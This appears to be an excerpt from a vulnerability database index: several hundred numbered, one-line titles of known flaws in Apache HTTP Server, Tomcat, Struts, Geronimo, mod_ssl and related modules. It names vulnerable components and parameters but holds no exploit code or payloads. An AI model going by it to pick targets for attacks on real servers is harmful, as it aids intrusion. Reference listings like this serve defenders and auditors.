18233| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
18234| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
18235| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
18236| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
18237| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
18238| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
18239| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
18240| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
18241| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
18242| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
18243| [56984] Apache Xerces2 Java Malformed XML Input DoS
18244| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
18245| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
18246| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
18247| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
18248| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
18249| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
18250| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
18251| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
18252| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
18253| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
18254| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
18255| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
18256| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
18257| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
18258| [55056] Apache Tomcat Cross-application TLD File Manipulation
18259| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
18260| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
18261| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
18262| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
18263| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
18264| [54589] Apache Jserv Nonexistent JSP Request XSS
18265| [54122] Apache Struts s:a / s:url Tag href Element XSS
18266| [54093] Apache ActiveMQ Web Console JMS Message XSS
18267| [53932] Apache Geronimo Multiple Admin Function CSRF
18268| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
18269| [53930] Apache Geronimo /console/portal/ URI XSS
18270| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
18271| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
18272| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
18273| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
18274| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
18275| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
18276| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
18277| [53380] Apache Struts Unspecified XSS
18278| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
18279| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
18280| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
18281| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
18282| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
18283| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
18284| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
18285| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
18286| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
18287| [51151] Apache Roller Search Function q Parameter XSS
18288| [50482] PHP with Apache php_value Order Unspecified Issue
18289| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
18290| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
18291| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
18292| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
18293| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
18294| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
18295| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
18296| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
18297| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
18298| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
18299| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
18300| [47096] Oracle Weblogic Apache Connector POST Request Overflow
18301| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
18302| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
18303| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
18304| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
18305| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
18306| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
18307| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
18308| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
18309| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
18310| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
18311| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
18312| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
18313| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
18314| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
18315| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
18316| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
18317| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
18318| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
18319| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
18320| [43452] Apache Tomcat HTTP Request Smuggling
18321| [43309] Apache Geronimo LoginModule Login Method Bypass
18322| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
18323| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
18324| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
18325| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
18326| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
18327| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
18328| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
18329| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
18330| [42091] Apache Maven Site Plugin Installation Permission Weakness
18331| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
18332| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
18333| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
18334| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
18335| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
18336| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
18337| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
18338| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
18339| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
18340| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
18341| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
18342| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
18343| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
18344| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
18345| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
18346| [40262] Apache HTTP Server mod_status refresh XSS
18347| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
18348| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
18349| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
18350| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
18351| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
18352| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
18353| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
18354| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
18355| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
18356| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
18357| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
18358| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
18359| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
18360| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
18361| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
18362| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
18363| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
18364| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
18365| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
18366| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
18367| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
18368| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
18369| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
18370| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
18371| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
18372| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
18373| [36080] Apache Tomcat JSP Examples Crafted URI XSS
18374| [36079] Apache Tomcat Manager Uploaded Filename XSS
18375| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
18376| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
18377| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
18378| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
18379| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
18380| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
18381| [34881] Apache Tomcat Malformed Accept-Language Header XSS
18382| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
18383| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
18384| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
18385| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
18386| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
18387| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
18388| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
18389| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
18390| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
18391| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
18392| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
18393| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
18394| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
18395| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
18396| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
18397| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
18398| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
18399| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
18400| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
18401| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
18402| [32724] Apache mod_python _filter_read Freed Memory Disclosure
18403| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
18404| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
18405| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
18406| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
18407| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
18408| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
18409| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
18410| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
18411| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
18412| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
18413| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
18414| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
18415| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
18416| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
18417| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
18418| [24365] Apache Struts Multiple Function Error Message XSS
18419| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
18420| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
18421| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
18422| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
18423| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
18424| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
18425| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
18426| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
18427| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
18428| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
18429| [22459] Apache Geronimo Error Page XSS
18430| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
18431| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
18432| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
18433| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
18434| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
18435| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
18436| [21021] Apache Struts Error Message XSS
18437| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
18438| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
18439| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
18440| [20439] Apache Tomcat Directory Listing Saturation DoS
18441| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
18442| [20285] Apache HTTP Server Log File Control Character Injection
18443| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
18444| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
18445| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
18446| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
18447| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
18448| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
18449| [19821] Apache Tomcat Malformed Post Request Information Disclosure
18450| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
18451| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
18452| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
18453| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
18454| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
18455| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
18456| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
18457| [18233] Apache HTTP Server htdigest user Variable Overfow
18458| [17738] Apache HTTP Server HTTP Request Smuggling
18459| [16586] Apache HTTP Server Win32 GET Overflow DoS
18460| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
18461| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
18462| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
18463| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
18464| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
18465| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
18466| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
18467| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
18468| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
18469| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
18470| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
18471| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
18472| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
18473| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
18474| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
18475| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
18476| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
18477| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
18478| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
18479| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
18480| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
18481| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
18482| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
18483| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
18484| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
18485| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
18486| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
18487| [13304] Apache Tomcat realPath.jsp Path Disclosure
18488| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
18489| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
18490| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
18491| [12848] Apache HTTP Server htdigest realm Variable Overflow
18492| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
18493| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
18494| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
18495| [12557] Apache HTTP Server prefork MPM accept Error DoS
18496| [12233] Apache Tomcat MS-DOS Device Name Request DoS
18497| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
18498| [12231] Apache Tomcat web.xml Arbitrary File Access
18499| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
18500| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
18501| [12178] Apache Jakarta Lucene results.jsp XSS
18502| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
18503| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
18504| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
18505| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
18506| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
18507| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
18508| [10471] Apache Xerces-C++ XML Parser DoS
18509| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
18510| [10068] Apache HTTP Server htpasswd Local Overflow
18511| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
18512| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
18513| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
18514| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
18515| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
18516| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
18517| [9717] Apache HTTP Server mod_cookies Cookie Overflow
18518| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
18519| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
18520| [9714] Apache Authentication Module Threaded MPM DoS
18521| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
18522| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
18523| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
18524| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
18525| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
18526| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
18527| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
18528| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
18529| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
18530| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
18531| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
18532| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
18533| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
18534| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
18535| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
18536| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
18537| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
18538| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
18539| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
18540| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
18541| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
18542| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
18543| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
18544| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
18545| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
18546| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
18547| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
18548| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
18549| [9208] Apache Tomcat .jsp Encoded Newline XSS
18550| [9204] Apache Tomcat ROOT Application XSS
18551| [9203] Apache Tomcat examples Application XSS
18552| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
18553| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
18554| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
18555| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
18556| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
18557| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
18558| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
18559| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
18560| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
18561| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
18562| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
18563| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
18564| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
18565| [7611] Apache HTTP Server mod_alias Local Overflow
18566| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
18567| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
18568| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
18569| [6882] Apache mod_python Malformed Query String Variant DoS
18570| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
18571| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
18572| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
18573| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
18574| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
18575| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
18576| [5526] Apache Tomcat Long .JSP URI Path Disclosure
18577| [5278] Apache Tomcat web.xml Restriction Bypass
18578| [5051] Apache Tomcat Null Character DoS
18579| [4973] Apache Tomcat servlet Mapping XSS
18580| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
18581| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
18582| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
18583| [4568] mod_survey For Apache ENV Tags SQL Injection
18584| [4553] Apache HTTP Server ApacheBench Overflow DoS
18585| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
18586| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
18587| [4383] Apache HTTP Server Socket Race Condition DoS
18588| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
18589| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
18590| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
18591| [4231] Apache Cocoon Error Page Server Path Disclosure
18592| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
18593| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
18594| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
18595| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
18596| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
18597| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
18598| [3322] mod_php for Apache HTTP Server Process Hijack
18599| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
18600| [2885] Apache mod_python Malformed Query String DoS
18601| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
18602| [2733] Apache HTTP Server mod_rewrite Local Overflow
18603| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
18604| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
18605| [2149] Apache::Gallery Privilege Escalation
18606| [2107] Apache HTTP Server mod_ssl Host: Header XSS
18607| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
18608| [1833] Apache HTTP Server Multiple Slash GET Request DoS
18609| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
18610| [872] Apache Tomcat Multiple Default Accounts
18611| [862] Apache HTTP Server SSI Error Page XSS
18612| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
18613| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
18614| [845] Apache Tomcat MSDOS Device XSS
18615| [844] Apache Tomcat Java Servlet Error Page XSS
18616| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
18617| [838] Apache HTTP Server Chunked Encoding Remote Overflow
18618| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
18619| [775] Apache mod_python Module Importing Privilege Function Execution
18620| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
18621| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
18622| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
18623| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
18624| [637] Apache HTTP Server UserDir Directive Username Enumeration
18625| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
18626| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
18627| [562] Apache HTTP Server mod_info /server-info Information Disclosure
